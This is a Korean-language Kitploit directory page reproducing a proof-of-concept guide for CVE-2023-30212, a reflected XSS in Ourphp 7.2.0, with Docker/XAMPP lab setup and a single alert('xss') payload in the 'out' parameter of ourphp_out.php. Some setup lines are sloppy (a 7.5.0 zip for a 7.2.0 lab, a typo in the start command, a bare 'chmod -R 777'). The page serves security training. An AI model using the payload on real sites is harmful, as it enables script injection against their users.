Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2023-30212-POC — CVE-2023-30212에 대한 개념 증명 익스플로잇으로, Ourphp 7.2.0에 존재하는 반사형 XSS 취약점입니다. Docker 환경 설정 및 단계별 익스플로잇 가이드를 포함합니다. | Kitploit
도구/GitHubGitHub/arunsnap/cve-2023-30212-poc
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingLearning & EducationLabs & Practice
GitHubarunsnap/cve-2023-30212-poc

CVE-2023-30212-POC

CVE-2023-30212에 대한 개념 증명 익스플로잇으로, Ourphp 7.2.0에 존재하는 반사형 XSS 취약점입니다. Docker 환경 설정 및 단계별 익스플로잇 가이드를 포함합니다.

저장소 보기
13년 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

CVE-2023-30212-POC

취약한 도커 환경 구축 및 Ourphp 7.2.0 버전 취약점 익스플로잇 (CVE 2023 30212)

1단계. 시스템에 도커를 다운로드 및 설치합니다. 저는 Docker를 사용하는데, Ubuntu 설치가 빠르고 쉽기 때문입니다.

2단계. 도커 환경 설정

root@kitploit:~
sudo apt-get install docker.io
docker pull ubuntu
docker run -d -t --name test-container -p 80:80 -p 443:44
3 -p 3306:3306 -p 21:21 ubuntu
docker exec -it test-container bash

3단계. 의존성 설치

root@kitploit:~
apt-get update
apt-get install wget
apt-get install nano
apt-get install unzip
apt-get install net-tools
apt-get install locate

4단계. 웹 서버, PHP 및 MySQL 설치. 이를 위해 XAMPP 서버를 설치하겠습니다.

root@kitploit:~
wget https://liquidtelecom.dl.sourceforge.net/project/xampp/XAMPP%20Linux/7.2.0/xampp-linux-x64-7.2.0-0-installer.run
chmod +x xampp-linux-x64-7.2.0-0-installer.run
./xampp-linux-x64-7.2.0-0-installer.run
cd /opt/lampp
./xmapp start

5단계. Ourphp 7.2.0 버전 다운로드

root@kitploit:~
wget https://zdown.chinaz.com/202305/ourphp-zyb-v7.5.0.20230515.zip
cp ourphp-zyb-v7.5.0.20230515.zip /opt/lampp/htdocs
unzip ourphp-zyb-v7.5.0.20230515.zip /opt/lampp/htdocs/
chmod -R 777

6단계. 브라우저에서 Ourphp 설정. 브라우저를 열고 localhost 또는 127.0.0.1을 입력하세요. 지시에 따라 Ourphp를 설치합니다.

7단계. 취약점 익스플로잇 Ourphp 7.2.0 버전에는 XSS(Cross-Site Scripting) 취약점이 있습니다. XSS 코드 실행을 허용하는 /client/manage/ourphp_out.php 파일의 취약점을 완화하려면

로그인 발견

코드를 수정해야 합니다. 취약점은 "ourphp_admin" 매개변수가 "logout"으로 설정되고 제어 가능한 변수가 "out"일 때 발생합니다.

최종

개념 증명

root@kitploit:~
 payload - "</script><script>alert('xss')</script>".
root@kitploit:~
parameter - http://localhost/client/manage/ourphp_out.php?ourphp_admin=logout&out=</script><script>alert('xss')</script>

비디오

video
(https://www.youtube.com/watch?v=l9lHyjY9_X0)

도구 다운로드